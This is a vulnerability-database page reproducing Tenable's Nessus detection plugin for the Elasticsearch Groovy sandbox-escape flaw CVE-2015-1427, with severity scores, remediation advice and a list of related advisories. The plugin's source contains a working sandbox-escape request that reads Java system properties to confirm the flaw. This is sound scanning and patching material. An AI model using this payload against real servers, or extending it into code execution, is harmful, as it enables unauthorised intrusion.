Lucene search
This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.ELASTICSEARCH_RCE_CVE-2015-1427.NASLHistoryMar 13, 2015 - 12:00 a.m.
Elasticsearch Groovy Script RCE
2015-03-1300:00:00
This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.
www.tenable.com
479
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.874 High
EPSS
Percentile
98.7%
The Elasticsearch application hosted on the remote web server is affected by a remote code execution vulnerability due to unspecified flaws in the Groovy script engine. A remote unauthenticated attacker, using a specially crafted request, can escape the sandbox and execute arbitrary Java code. A successful attack could allow the user to gain a remote shell or manipulate files on the remote system.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if (description)
{
script_id(81816);
script_version("1.15");
script_set_attribute(attribute:"plugin_modification_date", value:"2022/03/28");
script_cve_id("CVE-2015-1427");
script_bugtraq_id(72585);
script_xref(name:"CISA-KNOWN-EXPLOITED", value:"2022/04/15");
script_name(english:"Elasticsearch Groovy Script RCE");
script_set_attribute(attribute:"synopsis", value:
"The remote web server hosts a Java application that is affected by a
remote code execution vulnerability.");
script_set_attribute(attribute:"description", value:
"The Elasticsearch application hosted on the remote web server is
affected by a remote code execution vulnerability due to unspecified
flaws in the Groovy script engine. A remote unauthenticated attacker,
using a specially crafted request, can escape the sandbox and execute
arbitrary Java code. A successful attack could allow the user to
gain a remote shell or manipulate files on the remote system.");
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2015/Feb/92");
script_set_attribute(attribute:"see_also", value:"https://github.com/elastic/elasticsearch/issues/9655");
script_set_attribute(attribute:"solution", value:
"Upgrade to version 1.3.8 / 1.4.3 or later, or disable scripting.");
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:OF/RC:C");
script_set_attribute(attribute:"cvss_score_source", value:"CVE-2015-1427");
script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"exploit_framework_core", value:"true");
script_set_attribute(attribute:"exploited_by_malware", value:"true");
script_set_attribute(attribute:"metasploit_name", value:'ElasticSearch Search Groovy Sandbox Bypass');
script_set_attribute(attribute:"exploit_framework_metasploit", value:"true");
script_set_attribute(attribute:"exploit_framework_canvas", value:"true");
script_set_attribute(attribute:"canvas_package", value:"CANVAS");
script_set_attribute(attribute:"vuln_publication_date", value:"2015/12/09");
script_set_attribute(attribute:"patch_publication_date", value:"2015/02/11");
script_set_attribute(attribute:"plugin_publication_date", value:"2015/03/13");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_set_attribute(attribute:"cpe", value:"cpe:/a:elasticsearch:elasticsearch");
script_end_attributes();
script_category(ACT_ATTACK);
script_family(english:"CGI abuses");
script_copyright(english:"This script is Copyright (C) 2015-2022 and is owned by Tenable, Inc. or an Affiliate thereof.");
script_dependencies("elasticsearch_detect.nbin");
script_require_keys("installed_sw/Elasticsearch");
script_require_ports("Services/www", 9200);
exit(0);
}
include("audit.inc");
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
include("webapp_func.inc");
include("url_func.inc");
app = "Elasticsearch";
get_install_count(app_name:app, exit_if_zero:TRUE);
port = get_http_port(default:9200);
install = get_single_install(
app_name : app,
port : port
);
dir = install['path'];
url = build_url(qs:dir, port:port);
vuln = FALSE;
data = '{
"size": 1,
"query": {
"match_all": {}
},
"script_fields": {
"myscript": {
"script": "java.lang.Math.class.forName(\\"java.lang.System\\").getProperties()"
}
}
}';
res = http_send_recv3(
method:'POST',
port:port,
item:dir+"_search?pretty",
content_type:'application/json',
data:data,
exit_on_fail:TRUE
);
vuln = (
"200 OK" >< res[0] &&
"java.specification.version" >< res[2] &&
"java.version" >< res[2]
);
if (!vuln)
audit(AUDIT_WEB_APP_NOT_AFFECTED, app, url);
attack = build_url(qs:attack, port:port);
security_report_v4(
port : port,
severity : SECURITY_HOLE,
cmd : "System.getProperties()",
output : res[2],
line_limit : 25,
request : make_list(attack)
);
| Vendor | Product | Version | CPE |
|---|---|---|---|
| elasticsearch | elasticsearch | cpe:/a:elasticsearch:elasticsearch |
Related
kitploit
kitploit
Infection Monkey - An Automated Pentest Tool
2018-04-29 12:23:00
Infection Monkey v1.6 - An Automated Pentest Tool
2018-11-26 20:54:00
n0where
n0where
Data Center Security Testing Tool: Infection Monkey
2018-03-18 15:03:48
checkpoint_advisories
checkpoint_advisories
Elasticsearch Sandbox Escape Command Execution (CVE-2015-1427)
2015-10-19 00:00:00
attackerkb
attackerkb
CVE-2015-1427
2015-02-17 00:00:00
metasploit
metasploit
ElasticSearch Search Groovy Sandbox Bypass
2015-03-10 04:04:32
veracode
veracode
Arbitrary Shell Command Execution In The Groovy Scripting Engine
2015-02-18 17:22:02
cve
cve
CVE-2015-1427
2015-02-17 15:59:04
canvas
canvas
Immunity Canvas: ELASTICSEARCH_CVE_2015_1427
2015-02-17 15:59:00
packetstorm
packetstorm
ElasticSearch Unauthenticated Remote Code Execution
2015-03-12 00:00:00
ElasticSearch Search Groovy Sandbox Bypass
2015-03-12 00:00:00
myhack58
myhack58
ubuntucve
ubuntucve
CVE-2015-1427
2015-02-17 00:00:00
cisa_kev
cisa_kev
Elasticsearch Groovy Scripting Engine Remote Code Execution Vulnerability
2022-03-25 00:00:00
github
github
Improper Access Control in Elasticsearch
2022-05-14 02:49:44
osv
osv
Improper Access Control in Elasticsearch
2022-05-14 02:49:44
freebsd
freebsd
elasticsearch -- remote OS command execution via Groovy scripting engine
2015-02-11 00:00:00
nessus
nessus
zdt
zdt
ElasticSearch Search Groovy Sandbox Bypass Exploit
2015-03-12 00:00:00
ElasticSearch Unauthenticated Remote Code Execution Exploit
2015-03-12 00:00:00
threatpost
threatpost
NFL Players and Agents Targeted in Database Extortion Attempt
2017-10-09 09:00:39
Elasticsearch Elastichoney Honeypot Shows 8,000 RCE Attacks
2015-05-11 13:18:29
Windows, Linux Devices Hijacked In Two-Year Cryptojacking Campaign
2021-02-17 21:39:10
securityvulns
securityvulns
Elasticsearch vulnerability CVE-2015-1427
2015-02-22 00:00:00
Elasticsearch restrictions bypass
2015-02-22 00:00:00
nvd
nvd
CVE-2015-1427
2015-02-17 15:59:04
openvas
openvas
Elasticsearch Groovy Scripting Engine Unauthenticated Remote Code Execution
2015-03-12 00:00:00
nuclei
nuclei
ElasticSearch - Remote Code Execution
2021-02-15 18:17:25
prion
prion
Design/Logic Flaw
2015-02-17 15:59:00
cvelist
cvelist
CVE-2015-1427
2015-02-17 15:00:00
exploitdb
exploitdb
ElasticSearch - Remote Code Execution
2015-03-11 00:00:00
ElasticSearch - Search Groovy Sandbox Bypass (Metasploit)
2015-03-16 00:00:00
nmap
nmap
http-vuln-cve2015-1427 NSE Script
2015-05-21 10:02:56
impervablog
impervablog
talosblog
talosblog
avleonov
avleonov
Vulnerability Management at Tinkoff Fintech School
2019-03-04 10:38:31
redhat
redhat
7.5 High
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
PARTIAL
Availability Impact
PARTIAL
AV:N/AC:L/Au:N/C:P/I:P/A:P
0.874 High
EPSS
Percentile
98.7%
Related for ELASTICSEARCH_RCE_CVE-2015-1427.NASL